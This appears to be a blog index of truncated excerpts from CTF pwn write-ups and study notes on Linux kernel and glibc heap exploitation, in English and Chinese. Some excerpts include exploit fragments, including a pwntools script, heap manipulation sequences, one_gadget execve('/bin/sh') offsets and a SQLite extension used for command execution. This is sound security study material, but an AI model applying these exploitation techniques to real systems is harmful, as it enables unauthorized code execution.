I document these points when I learn CFI related materials. kCFI is a Control-Flow Integrity implementation for the Linux kernel not hardware support is required. The following config would enable it: ./scripts/config -e CFI_CLANG ./scripts/config -d CFI_PERMISSIVE make LLVM=1 LD=ld.lld olddefconfig make LLVM=1 LD=ld.lld -j"$(nproc)" When we do forward controlflow changing (e.g., call/jmp), it checks the hash (4 bytes before...

When using syzkaller there are many syzkalls; we want to avoid slow ones, so we need to locate them. This post shows how to solve the following problem: Assuming we have downloaded a corpus, we want to obtain a list of syzkalls that are slow. https://github.com/n132/slow-syzkall-locator The execution time of a syzkall can vary because of state or arguments. This...

This is a challenge in HITCON 2023, a simple UAF challenge. It mentions KASLR-FG so I used to data-flow attack. The attachment is from this repo. This challenge is very simple and it provides a primitive that enables you UAF-Free a point. Considering there is no kamlloc-cg and there is KASLR-FG, I used dataflow attack method attacking /etc/passwd by pipe_buffer...

This is a CTF write-up for the challenges kUlele in crewCTF 2024. This is also my first challenge solved during the CTF game. attachment It’s a simple kernel challenge. It’s like the userspace menu heap challenge. In ioctl, there are three features, including add, allocate a kernel heap object (at most 10 times) del, free an allocated heap object show,...

This is a CTF write-up for the challenges Ulele in crewCTF 2024. This is an after-ctf writeup since my teammate solved it during the game. Attachment It’s a simple menu-heap challenge on glibc-2.35. The users have three options to interact with the challenge add: malloc(0x68) and read 0x64 bytes from users to fill the chunk show: print the content of...

To practice kernel exploitation, I plan to solve old CTF challenges and learn different skills from others. Before doing this challenge, I already knew about the cross-cache attack from IPS. However, when I applied the same method to this challenge, I found it difficult to perform cross-page when the target allocation was noisy. After reproducing the official write I exploited...

To practice kernel exploitation, I plan to solve old CTF challenges and learn different skills from others. Basically, I’ll try to solve it by myself and then learn others’ solutions. This is the first challenge for this serial, hope it’s not the last one. Attachment This is a kernel challenge from corCTF 2021. You can also check the write-up from...

I learned this skill from this article. This article is shitty since I wrote three write-ups for the same challenge. I just document what’s new so it’s not for other readers. I recommend you to read Kyle’s original post. Thanks @Kyle for the write-up! The attachment is available here. I analyzed the challenge and introduced related skills in this article....

I learned this skill from this article. This article introduces kernel heap freelist hijacking and related mitigations. It’s also a write-up for challenge IPS(VULNCON 2021). Before reading you should know: Linux Kernel Exploitation Technique: Overwriting modprobe_path. Thank @zolutal for saving me during hacking. The first part of this article is the same as this article, which introduces another method to...

While performing page level fengshui in linux kernel, I don’t know how to get the the order number of one object. For exmaple, we know the size of struct so we know how large the object is but we don’t know how many pages the linux kernel heap manager gonna allocate when we run out of all objects. We gonna...

Use the C language function asm to write shellcode. This article is a part of my cheat sheet. Two weeks ago, I used c language to talk to the target vulnerable binary and executed the sent shellcode to get a shell. But I feel it’s verbose to use Python to generate the shell code. So I read several articles about...

I learned some new skills about format string vulnerabilities from HITCON challenge: Wall Sina. I thought I knew all the format string attacking skills. However, during HITCON 2023, I encountered a simple but challenging format strings problem since I didn’t know a very useful skill. I’ll introduce this skill in this article and talk about some things we should take...

I didn’t solve this challenge, this is an after game reproducing write-up. The solution is from my teammates @in1t. We are allowed to execute arbitrary libc functions (not starting with _) All parameters only have 4 bytes There is a check function to check if we have allocated memory less than 0x100000000. Can we register more than one function by...

r3kapig, 1st noabug Solvers: crazyman and n132 noabug2 Solvers: n132, KIM and debugger There is a new feature for sqlite that allows loading external libcs. For this challenge, we can create a new lib so we can just load a external lib to execute arbitrary command. exp.c: /* Add your header comment here */ #include <stdio.h> #include <sqlite3ext.h> /* Do...

The teamwork carried me! I participated DEF CON 31 qualification round last weekend as a member of P1G BuT S4D and we got 9th in this round. I write this article to document several challenges I worked on. You can also find the official challenge source code/ solution here: https://github.com/nautilus-institute/quals-2023 Analysis: We need to reverse the challenge by interacting with...

Recovering. I solved 3 pwn challenges in the game and spent 20 hours on the 4th challenge(stuff). Also, the 4th one teaches me a lot. It’s a good challenge. This is a classic stack challenge, which overflows 0x10 bytes. We can overwrite the stored RBP and the return address. So stack pivot is easy to get to exploit since there...

A great honor to be one of the CSAW developers and I wrote three challenges for the CSAW qualification round. You can get the attachment and source code from Osiris Lab Cuz CSAW is an entry-level CTF, we would have lots of players who are very new to cybersecurity. I try to make my pwn challenges interesting and educational. This...

I only have little experience with kernel pwn. During the Intro_to_OS course, I read a lot of kernel code of xv6 and learned the kernel systematically. Although xv6 is a simple system while the Linux kernel is much more complex, the knowledge from xv6 learned helps a lot. This post would not go too deep into the kernel because I...

I only have little experience with kernel pwn. During the Intro_to_OS course, I read a lot of kernel code of xv6 and learned the kernel systematically. Although xv6 is a simple system while the Linux kernel is much more complex, the knowledge from xv6 learned helps a lot. This post would not go too deep into the kernel because I...

In this section we would review the syscall from both high level and low level! Also, we would also go through other similar mechanisms, such as the interupt, to have a more clear view of the operation system. Let’s start from something simple, adding a system call. In this section, we gonna add a new syscall SYS_n132 to the xv6...

This is a challenge in the zer0pts CTF 2022. It’s pity that I didn’t solve it in the game, but it’s supper worthy to write a single post for this challenge. I learned a lot in this challenge, including some unrelated knowledge. Yeah, I tried tons of wrong ways to solve it. And the official solution is really innovative for...

I’ll have a quick look at XV6 shell.c to understand the implementation of its features, such as running command, redirection, pipe, list… You can find the source code in xv6’s repository. (https://github.com/mit-pdos/xv6-public/blob/master/sh.c) main chdir (command cd) Parse & Run Command We have 6 structions and 5 kinds of command types, including execcmd, redircmd, pipcmd, listcmd, and backcmd, and they have...

Real world CTF is my first CTF in 2022, I had a great time with my teammates@r3kapig! Especially thanks to @2019 @crazyman, we solved the challenge together! This challenge is my first real-world challenge. Someone calls it “clone and pwn” challenge, which means we should clone the latest version of the project and pwn it with 0day vulnerability. Also, nbd...

The document of Address Sanitizer is amazzzzzing, this passage is personal note about the doc. AddressSanitizer · google/sanitizers Wiki It’s project from google, named AddressSanitizer ASan. Use after free / dangling pointer dereference Heap / Stack / Global buffer overflow … Hook malloc and free in run-time. Poising the address around malloc-ed chunk and quarantine the free -ed chunks. When...

上周和文萱还有远程队友师傅们参加了qwb final，0输出摸鱼选手，一题vmnote做两天，我至今疑惑为啥1血那么快就出来了，第2天早上我们才逆完虚拟机的asm，这大概就是差距吧orz。这是我做的第一题vmpwn，感觉挺有趣的，除了hardworking的部分以外。 那天下午一直以为洞在vm操作里，我看了34个小时感觉vm写的很安全，后来看heap操作的时候感觉有点小瑕疵之外还是很安全的（这个小瑕疵没有直接利用的可能），唯独没看readint操作。没想到这弄没大眼的家伙居然藏了个offbynull。最后2.5小时开始写exp，但是一不小心mv /lib/x86_64-linux-gnu/libc-2.31.so . 直接把docker弄挂了，重写最后都控制执行流了但是一直卡在一个read坑里，最后时间跑完了也没搞出来。 总之题目是挺有意思的，虽然很多我没实力体验，下次有机会再来。 （完整的逆向内容我就不贴了想体验这题的建议从逆向开始<3） attachment: https://github.com/n132/attachment/tree/main/QWB_2021_Final/vmnote update 07/20/2021 vmnote decompiler: https://github.com/P4nda0s/qwb_vmnote_recompiler 这题有个note.bin的文件，binary实现了一个虚拟机，note.bin是一个程序可以放在虚拟机里面跑，直接运行的话有个密码。 binary的虚拟机逆向还是比较轻松的，一共10几个操作逆向完就行；一开始需要逆向，还有就是我们当时经验缺乏的一个点，逆向可以先着重找password部分patch掉，让负责pwn的师傅可以先跑起来熟悉熟悉，无逻辑找找洞。 之后就需要逆向虚拟机的binary，这个部分我们是由枥锐师傅写了一个解释器，将虚拟机binary解释成类似于汇编语言的形式： 0x145--------: push rbp 0x147--------: mov rbp, rsp 0x14a--------: mov r0, 0x1132 0x154--------: call write 0x159--------: call readint # ReadInt ... 之后我们再一段段人脑f5，标注每个函数的意思： 0x0 - 0x22 == main 0x23 - 0x3c == initRandSeed 0x3d - 0x4c == exit(0) 0x4d -0x5c == getTime 0x5c -0x6a...

libc version == 2.31 漏洞点： add会比输入的size大一个字节之后会补零，之后会往内容后面多半个字节写一个checksum(暂且称之为offby0.5) show的时候会检查checksum不过写的有些问题用的是&1所以一半可能性能show出来（虽然index和ptr和size会被检查） 虽然做完之后感觉也没啥，但是这种利用large bin的方式很巧妙值得一篇单独的wp。 本题之中开始时能用的上的只有 offby0.5,不能控制size大小所以只能控制inuse，这时候只能走unlink。因为unlink会检查 fd→bk 和bk→fd，但是没有泄漏，所以需要借助已有的地址，至于为什么要用largin bin因为large bin可以直接提供两个指向自己的heap指针且恰好可以设计size=presize（其实我是马后炮，我是看了队友给出的一篇文章发现2.29没泄漏走large bin比较快）。 一个large bin一般长这样，我们构造我们的fake chunk 再large bin +0x10处，将bk改成size，使其等于persize，presize自己算，恰好把fake chunk给unlink掉。 large bin (splited): -------------------------------- presize size -------------------------------- fd bk -------------------------------- fd_nextsize bk_nextsize -------------------------------- unsorted bin ... -------------------------------- attack chunk:(which offby0.5/with a fake presize) -------------------------------- victim: (which would consolidate backforward) ... -------------------------------- 我们的写指针从fd开始写，当只有一个large bin的时候nextsize指针都指向自己，这是个优势我们如果要满足unlink只需要 presize = large bin...

很棒的一题，主要使用了libc-2.29下利用 small bin tache stash tacache中有6个chunk的情况，攻击效果是类似于之前版本的 unsorted bin attack 往任意地址写固定值。 libc=2.29 保护全开+orw UAF malloc范围限制在small bin范围 UAF比较明显，很容易泄漏heapbase&libcbase,主要难在利用，因为题目用的是calloc所以不从tcache里面取，有个隐藏菜单可以malloc 0x217，但仅限于tcache满的时候。 所以在这种情况下，tcache和small bin的路已经被锁死了，需要用 small bin相关的利用来扩大利用。 libc 2.29引入的新机制，可以在这里看看，和本题相关的简单来说当tcache未满时从small bin取下一个时会将剩下的chunk放入tcache，但是检查不严格。如下可以看到，没有检查bck的fd是不是victim。 #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /*...

realloc-revenge是realloc那题的一个加强版，主要逻辑不变，在allocate里面的realloc变成了malloc，保护全开，依然是2.29的libc。最佳我做到的应该是1/16，只需要猜stdout的半个字节。 漏洞点是realloc在设定size为0时执行free但是指针不清空所有有UAF有几个组合技巧。 本文的伪代码第一个参数为指针的idx，第二个参数为size，第三个参数是写入内容。 一共就两个可用指针，malloc最大0x78，想要控制任意地址就需要利用realloc的切割。 malloc(0,0x78) realloc(0,0) realloc(0,0x78,p64(Arbitrary Address)) malloc(1,0x78) realloc(1,0x28) free(1) malloc(1,0x78,Paylaod) 填满tcache需要6个chunk，要求是尽可能只用掉一个size的list，因为如果用切割那么会填满2个而我们后面还有为了清空指针切割两次的操作会用到 0x80→0x40*2→0x20*2。可以使用 realloc-expand来搞定。 for x in range(7): add(0,0x28) realloc(0,0x68) free(0) add(0,0x28) realloc(0,0x68) add(1,0x18) free(0) 这个也不算什么组合。。就是正常的realloc为0之后realloc原来的大小就可以看成是edit了。 因为这题我走了些弯路所以有比较直接的1/256的做法和比较绕圈圈的1/16做法。先讲1/16的做法。 要想1/16所堆绝对不能猜，也就是不能用管理tcache的结构体。只能靠填满tcache然后用consolidate来获得一个smallbin。前文的Tricks中已经讲了如何填满tcache所以后面要做的是在menu等待输入的时候输入 '1'*0x400 就可以触发。之后比烦需要改两次，一次是把tcache劫持指向获得的smallbin，第二次是把smallbin用前面说到的 Modify Arbitrary Address 来partial write smallbin的fd(此处猜1/16)。接着IO_LEAK，之后控制free_hook+get shell，写了70多行。 from pwn import * context.arch='amd64' context.terminal=['tmux','split','-h'] def cmd(c): p.sendlineafter("ice: ",str(c)) def add(idx,size,c="A"): cmd(1) p.sendlineafter(":",str(idx)) p.sendlineafter(":",str(size)) p.sendafter(":",c) def realloc(idx,size,c="A"): cmd(2) p.sendlineafter(":",str(idx)) p.sendlineafter(":",str(size)) if(size>0):...

one_punch_man(glibc-2.29) twochunk(glibc-2.30) one_punch_man(glibc-2.29) & twochunk(libc-2.30) This passage would introduce a new tcache attach method: “tcache stashing unlink attack” before the main part, it’s important to know what’s new in glibc-2.29. I found we can’t use setcontext as before, becouse it will set rbx as a base-ptr rather than rdi. //setcontext push rdi ... ... pop rbx mov rsp, qword ptr...

堆风水主要的漏洞点有两个 idx 越界 free ptr uninitialization 主要的难点是他的输入采用了 先读到stack上之后strcmp: \x00截断 用的是fgets长度0x40: 长度比较短,只能一点一点来,而且防止简单地泄漏。 其中主要有2个结构体 描述食材,是由bss上一个指针指向的一个单向链表. struct A{ struct A* pre;//单向链表状 int stock;//库存量 char * name;//食材名字 } 描述烤架上正在烧烤的食物. struct food{ struct A* raw;//指向食材 int state;//表示被烤的程度,如果程度达到8且在烤架0-5上就会被烤成炭(无法吃-free) unsigned long long flag; //0xdeadbeef11 表示可以free } 其中的操作主要由4个(其中4是我杜撰的…) 创建食材,可以设置stock,如果是已有的食材那么新加的stock会加到原有的stock上(不要忽视这一点…) 食材上烤架,可以任意设置在烤架的位置(signed int),食材必须在以经入链,上烤架之后会减少库存1. 吃食物,此处可以free任意地址(满足的条件是*(ptr+0x10)=0xdeadbeef11) 设置操作3的ptr可以使用1操作creat("A"*0x28+p64(ptr),0)来实现 通过以上操作的各种组合我们可以得到以下比较容易想到的操作组合 (后文我将操作一称为creat,操作二称为add,操作3称为free) 整理内存 通过先囤积一部分0x20的chunk之后free的方式让堆内存更清晰(我个人感觉如此) ```python creat(“n132”,0x666) add(“n132”,21) add(“n132”,22) add(“n132”,23) add(“n132”,24) free(21) creat(“something”,1) 2. 构造任意`size`的`fake_chunk`(通过这样的方式我们可以构造出`unsorted bin`)...

ubuntu16.04 LTS的onegadget如下 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL 可以推出以下16个联合攻击方式 p64(0x4526a+base)+p64(libc.sym['realloc']) [rsp-0x40] == NULL (*) p64(0x4526a+base)+p64(2+libc.sym['realloc']) [rsp-0x38] == NULL (*) p64(0x4526a+base)+p64(4+libc.sym['realloc']) [rsp-0x30] == NULL (*) p64(0x4526a+base)+p64(6+libc.sym['realloc']) [rsp-0x28] == NULL (*) p64(0x4526a+base)+p64(11+libc.sym['realloc']) [rsp-0x20] == NULL (*)...

最近在buuoj上做了比较有收获的一题把学到的东西总结一下,主要用两个方向一个ptrace另一个是orange + setcontxt ptrace主要是了解其主要的用法,并自己动手写一写. orange + setcontxt我感觉在很多情况下挺有用的，现在很多题都用到了setcontext,可以总结一下来搞一个模版之类的，可能另起一篇博客。 题目在buuoj上有复现 我在Github上的备份(其中raw为原版binary,pwn是我为了方便调试patch后版本) exp.py pwn raw ➜ ciscn_2019_final_4 checksec ./raw [*] '/home/n132/Desktop/ciscn_2019_final_4/raw' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 程序除了没开PIE其他都开了,有add,show,free三个功能,add中输入为read比较nice的.. 主要的漏洞是free中没有清空指针,造成了UAF 以上是基本情况,接下来是本题特殊的地方,主要有两个部分:seccmp,ptrace 本题一开始就关掉了execve ➜ ciscn_2019_final_4 seccomp-tools dump ./pwn line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x35 0x02 0x00...

@ad2019-07-06 虽然做FMT_STRING漏洞的题目已经挺多了，但是对于printf实现过程也只是处于了解阶段，想要借着完成printable@pwnable.tw的机会仔细理解一下源码（虽然我还没做出来，但我感觉这题和fmtstr内部没什么多大关系），因为白天有事情时间有限可能完成得断断续续,分析的粒度主要看精力如果在接受完白天的摧残后晚上精力比较充沛可能分析的比较仔细,如果脑子快运作不起来了的话粒度可能比较粗。 首先是最开始的程序 #include<stdio.h> int main() { printf("n132\n"); } 看似很简单的printf其实内部的实现是非常复杂的. 其入口位于glibc/stdio-common/printf.c //glibc-2.23 int __printf (const char *format, ...) { va_list arg; int done; va_start (arg, format); done = vfprintf (stdout, format, arg); va_end (arg); return done; } #undef _IO_printf ldbl_strong_alias (__printf, printf); 可以看出主要实现在vfprintf里，跟过去就会发现一个400多行的函数，直接啃难度太大的,我就先把vfprintf放到一边,复习一遍最基本的输入输出. 学过操作系统的应该都了解进程空间分为内核空间和用户空间,内核空间会提供一些系统调用来给运行在用户空间的程序用以完成一些基本的任务，像是读写打开什么的.这些系统调用可以完成最基本的工作，其他复杂的函数是通过许多的基本系统调用组合而成的。关于输入输出最基本的就是x64的0号调用sys_read和1号调用sys_write 下面是通过系统调用输入输出的一个demo int main() { asm( "xor %rax,%rax\n" "mov $0x9,%al\n" "mov $0xcafe000,%rdi\n" "mov $0x1000,%rsi\n" "mov $0x3,%rdx\n" "mov...

发现我做题的一个特性…就是遇到了不会做的题目之后它后面放出的题目连洞都找不到… Rctf_2019 many_note 比赛的时候洞都找不到…遇到遭遇较少的场景就比较慌… 复线的时候在balsn的wp中发现这题应该起源于 N1ctf_2018 Null 于是就先去去做一下Null 比赛后发现洞就比较清晰了….说到底还是做题太少了知识面太窄了. 通过此题拓展一下关于thread_heap的技能点 [*] '/home/n132/Desktop/null' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 没开pie. 主线程逻辑比较简单，输入准备好了自后睡3秒就新开了一个线程主线程 然后等待线程推出 主要有三个功能： add exit system(‘/usr/bin/id’) add 比较独特： input the size:[0,0x4000] input the pad blocks:[0,1000] malloc(size) * pad malloc(size) (可以输入但是输入之后指针就丢掉了) 整个题目形式比较新,只有add就像/dev/null像个黑洞… 比赛的时候没有看出来…,结束后看题目脑子特别清醒…发现因为操作比较单一所以容易出现问题的地方应该是输入… for ( i = 0LL; ; i += v3 )...

(pwn)出题的时候没什么特殊需求都会对stdout,stdin设置: setvbuf(stdout,0,2,0); setvbuf(stdin,0,2,0); 但是一直对缓冲区只有个模糊的概念..这次完整地学一遍… 缓冲区又称为缓存，它是内存空间的一部分。也就是说，在内存空间中预留了一定的存储空间，这些存储空间用来缓冲输入或输出的数据，这部分预留的空间就叫做缓冲区。 计算机对内存的读写速度远超硬盘的读写速度,提高计算机速度可从减少对硬盘的操作次数。 所以可以每次读写的时候多读（写）一些放在缓冲区中如果下次需要再去读可以直接在缓冲区中读取。 总的来说就是提高计算机速度。 定义在glibc/libio/iosetvbuf.c中 //https://code.woboq.org/userspace/glibc/libio/iosetvbuf.c.html#_IO_setvbuf #define _IOFBF 0 /* Fully buffered. */ #define _IOLBF 1 /* Line buffered. */ #define _IONBF 2 /* No buffering. */ 一共有三种类型:全缓冲，行缓冲，无缓冲 我们常用的setvbuf(stdout,0,2,0)中的2就是代表无缓冲输入输出直接写入文件 全缓冲的话除了强制刷新缓冲区之外只有缓冲区填满才会刷新。 行缓冲是在全缓冲上增加了遇到换行符也刷新缓冲区。 常见的stdout初始就是行缓冲缓冲区大小为8192bit 在glibc/libio/stdio.h中有定义#define BUFSIZ 8192 可以通过以下程序验证。 #include<stdio.h> char buf[0x123]; int main() { puts("n132"); printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI");//"A"*0x400+"I" read(0,buf,0x132); } 程序会输出1024个”A”但是”I”会留在缓冲区中 输出结束后stdout情况如下 n132>>> p *stdout $1 = { _flags =...

很自由的一题但是了解下去发现题目的各个思路还是很巧妙的. 先讲几个在这题中学到新姿势 其作用是用户上下文的获取和设置 所以我们在可以小范围控制执行流已知libc_base但不足以完成我们的目标时可以先跳setcontext+53来扩大控制范围.. 感觉非常好用..可以直接控制大部分寄存器和执行流. 0x7ffff7a7d4a0 <setcontext>: push rdi 0x7ffff7a7d4a1 <setcontext+1>: lea rsi,[rdi+0x128] 0x7ffff7a7d4a8 <setcontext+8>: xor edx,edx 0x7ffff7a7d4aa <setcontext+10>: mov edi,0x2 0x7ffff7a7d4af <setcontext+15>: mov r10d,0x8 0x7ffff7a7d4b5 <setcontext+21>: mov eax,0xe 0x7ffff7a7d4ba <setcontext+26>: syscall 0x7ffff7a7d4bc <setcontext+28>: pop rdi 0x7ffff7a7d4bd <setcontext+29>: cmp rax,0xfffffffffffff001 0x7ffff7a7d4c3 <setcontext+35>: jae 0x7ffff7a7d520 <setcontext+128> 0x7ffff7a7d4c5 <setcontext+37>: mov rcx,QWORD PTR [rdi+0xe0] 0x7ffff7a7d4cc <setcontext+44>: fldenv [rcx] 0x7ffff7a7d4ce <setcontext+46>: ldmxcsr DWORD PTR...

主要来源p4nda IDA下patch主要是原有的patch功能和添加的插件例如keypatch 安装(for mac): https://github.com/fjh658/keystone-engine https://github.com/keystone-engine/keypatch git clone https://github.com/fjh658/keystone-engine.git cd keystone-engine git submodule update --init --recursive sudo python setup.py install --verbose cp -rf /usr/local/lib/python2.7/site-packages/keystone /Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS/python/ brew install cmake control+option+k可以直接打汇编指令也可以用符号.(长度不足补齐nop) 右键可以search 汇编指令 这个还不知道keypatch咋整…如果使用patchpyte过程如下 例如替换printf为puts 即call printf ======>call puts 原来的值 old puts@plt printf@plt new_address:(old+puts-printf) 改变比较有限,不能call 没有plt的函数.不能hook mac上没装成功ubuntu好像直接pip install lief就可以了 说明文档太长还没去看… https://lief.quarkslab.com/doc/latest/api/python/elf.html#segment 直接改strtab 例如fmtstr漏洞修复:printf==>puts (注意这里比较暴力注意其他地方有没有用printf的,是否受影响…) 脚本如下 # @n132 import lief import...

做了挺多 off by one 有点感悟总结一下. 在此感谢楠姐@Keenan的关于shrink+unlink的思路 以及xman时张燕秒老师关于off_by_one的启蒙 溢出漏洞,但是又非常有限制只有溢出一个字节,而在一般off by one情况下溢出的往往是null_byte:\x00. 本文仅讨论heap 上出现的off by one 导致漏洞的情况非常多,我在这里列出在ctf比赛中最常见的几种情况: Case I: char *buf=malloc(0x88); unsigned int n=read(0,buf,0x88) buf[n]=0; Case II: char *buf=malloc(size); read(0,buf,size) buf[size]=0 Case III #此处不只有溢出1字节可操作性也很大. unsigned int n=strlen(chunk_ptr); read(0,chunk_ptr,n); 比较安全的话输入可以使用fgets虽然我做题目的时候非常讨厌看到它. 主要漏洞的成因是我们可以溢出一个字节,但是那个字节在ptmalloc中又非常的重要,涉及到了 chunksize ,inuse.所以我们主要从chunksize和inuse来设计我们的攻击方式 对chunksize的修改可以分为两种 extend和shrink //图片是在xmanppt里面偷来的. 要求比较高但是利用起来简单. 要求对溢出的那一个字节不为null byte这样就可以拓展chunk 常见的利用方式有两个free + modify 和modify + free 先free 进入unsorted bin 之后改变 size 以达到overlap的或者overflow的目的 改变现有chunk B的size...

周末的时候忙里偷闲做了一下2k19的一个比赛里面有binary的都比较简单..没binary的比较懒没去看..但是有道题做不出来…baby2. 比完之后看了wp发现使用_dl_runtime_resolve之前有做过当时搞懂了但是复现的时候发现自己一脑茫然…还是重学一遍…长久不用就忘记了. winesap_社课比较长比较详细…没时间的我打算自己通过源码复习… https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h 主要涉及两个结构体 这里摘录一下 #Elf32_Rel size=0x8 typedef struct elf32_rel { Elf32_Addr r_offset;//got Elf32_Word r_info;//idx } Elf32_Rel; #Elf32_Rela size=0xc typedef struct elf32_rela{ Elf32_Addr r_offset;//got Elf32_Word r_info;//idx Elf32_Sword r_addend; } Elf32_Rela; #Elf32_Sym size=0x18 typedef struct elf32_sym{ Elf32_Word st_name;//offset Elf32_Addr st_value; Elf32_Word st_size; unsigned char st_info; unsigned char st_other; Elf32_Half st_shndx; } Elf32_Sym; #Elf64_Rel size=0x10 typedef struct elf64_rel { Elf64_Addr r_offset;...

环境 ➜ string g++ --version g++ (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609 Copyright (C) 2015 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ string /lib/x86_64-linux-gnu/libc-2.23.so GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release version 2.23, by Roland McGrath et al. Copyright...

House of Roman 主要是利用了 &main_arena+0x58 和一些 one_gadget位置接近只要partial write 就可以不需要leak. UAF control size(any_size_malloc   off by one   overflow) no leak mainly: fast bin atk unsorted bin atk partial write 从经典的一个题目讲起 new_chall Noleak malloc 任意大小chunk 可以覆盖next_chunk_size read(0, heap_ptrs[v1], v2 + 1); UAF if ( v0 <= 19 ) free(heap_ptrs[v0]); fastbin atk to control malloc_hook unsorted bin to make malloc_hook=&main_arena+0x58 partial write...

长久没用今天做IO_FILE的时候重做了一遍感觉 理解更深。 顺便追了一下关于IO_FILE的源码 程序主要有两个结构体:info & house info struc ; (sizeof=0x8, mappedto_9) 00000000 price dd ? 00000004 color dd ? 00000008 info ends 00000008 house 00000000 house struc ; (sizeof=0x10, mappedto_6) 00000000 infomation dq ? ; offset 00000008 name dq ? 00000010 house ends 主要功能有： add():4次 upgrade():3次 show() 保护全开 主要漏洞点比较清楚edit的时候可以任意输入size int edit() { info *info_ptr; // rbx unsigned int size; //...

应该spirit 来源于这里 https://pwnable.tw/challenge/#22 spirited away 主要的功能是写影评. ➜ spirited_away checksec spirited_away [*] '/home/n132/Desktop/spirited_away/spirited_away' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 程序比较简单输入名字输入为啥看这部电影 感受如何. 主要的漏洞点也比较常规. sprintf(&v1, "%d comment so far. We will review them as soon as we can", cnt); char v1; // [esp+10h] [ebp-E8h] size_t nbytes; // [esp+48h] [ebp-B0h] 这里只要cnt长度>(0x38-54)=3 v1可以溢出覆盖到nbyte 原本nbyte=0x3c 会被覆盖成n也就是0x6e...

不附exp… …shellcode被玩坏了… 这题是用数字和元素周期表的内容写shellcode… 做的时候感觉有时候判定有问题…最好不要拿数字去充填…有时候会出错… 做完之后再也不想碰这题… ele=['\x48','\x48\x65','\x4C\x69','\x42\x65','\x42','\x43','\x4E','\x4F','\x46','\x4E\x65','\x4E\x61','\x4D\x67','\x41\x6C','\x53\x69','\x50','\x53','\x43\x6C','\x41\x72','\x4B','\x43\x61','\x53\x63','\x54\x69','\x56','\x43\x72','\x4D\x6E','\x46\x65','\x43\x6F','\x4E\x69','\x43\x75','\x5A\x6E','\x47\x61','\x47\x65','\x41\x73','\x53\x65','\x42\x72','\x4B\x72','\x52\x62','\x53\x72','\x59','\x5A\x72','\x4E\x62','\x4D\x6F','\x54\x63','\x52\x75','\x52\x68','\x50\x64','\x41\x67','\x43\x64','\x49\x6E','\x53\x6E','\x53\x62','\x54\x65','\x49','\x58\x65','\x43\x73','\x42\x61','\x4C\x61','\x43\x65','\x50\x72','\x4E\x64','\x50\x6D','\x53\x6D','\x45\x75','\x47\x64','\x54\x62','\x44\x79','\x48\x6F','\x45\x72','\x54\x6D','\x59\x62','\x4C\x75','\x48\x66','\x54\x61','\x57','\x52\x65','\x4F\x73','\x49\x72','\x50\x74','\x41\x75','\x48\x67','\x54\x6C','\x50\x62','\x42\x69','\x50\x6F','\x41\x74','\x52\x6E','\x46\x72','\x52\x61','\x41\x63','\x54\x68','\x50\x61','\x55','\x4E\x70','\x50\x75','\x41\x6D','\x43\x6D','\x42\x6B','\x43\x66','\x45\x73','\x46\x6D','\x4D\x64','\x4E\x6F','\x4C\x72','\x52\x66','\x44\x62','\x53\x67','\x42\x68','\x48\x73','\x4D\x74','\x44\x73','\x52\x67','\x43\x6E','\x46\x6C','\x4C\x76'] ele+=['1','2','3','4','5','6','7','8','9','0'] 寻找可用的元素.. 凑/bin/sh 凑int 0x80 我是一个一个…试过去…数字组合当时没有想到..做得好辛苦i ''' [H] dec eax 0x47 [He] would not be used [B] inc edx 0x42 [C] inc ebx 0x43 [N] dec esi 0x4e [O] dec edi 0x4f [F] inc esi 0x46 [Ne] would not be used [P] push eax 0x50 [S] push ebx 0x53 